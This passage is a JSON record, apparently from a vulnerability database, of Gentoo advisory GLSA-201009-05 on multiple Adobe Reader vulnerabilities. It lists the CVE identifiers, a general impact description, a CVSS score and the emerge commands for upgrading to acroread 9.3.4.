"CVE-2010-2210", "CVE-2009-4324", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-0188", "CVE-2010-2204", "CVE-2010-0194", "CVE-2010-1285", "CVE-2010-0191", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-0195", "CVE-2010-0201", "CVE-2010-0197", "CVE-2010-2208", "CVE-2010-2168", "CVE-2010-0203", "CVE-2010-1241", "CVE-2010-0199", "CVE-2010-0202"], "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Reader. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker might entice a user to open a specially crafted PDF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or bypass intended sandbox restrictions, make cross-domain requests, inject arbitrary web script or HTML, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.3.4\"", "edition": 1, "modified": "2010-09-07T00:00:00", "published": "2010-09-07T00:00:00", "id": "GLSA-201009-05", "href": "https://security.gentoo.org/glsa/201009-05", "type": "gentoo", "title": "Adobe Reader: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
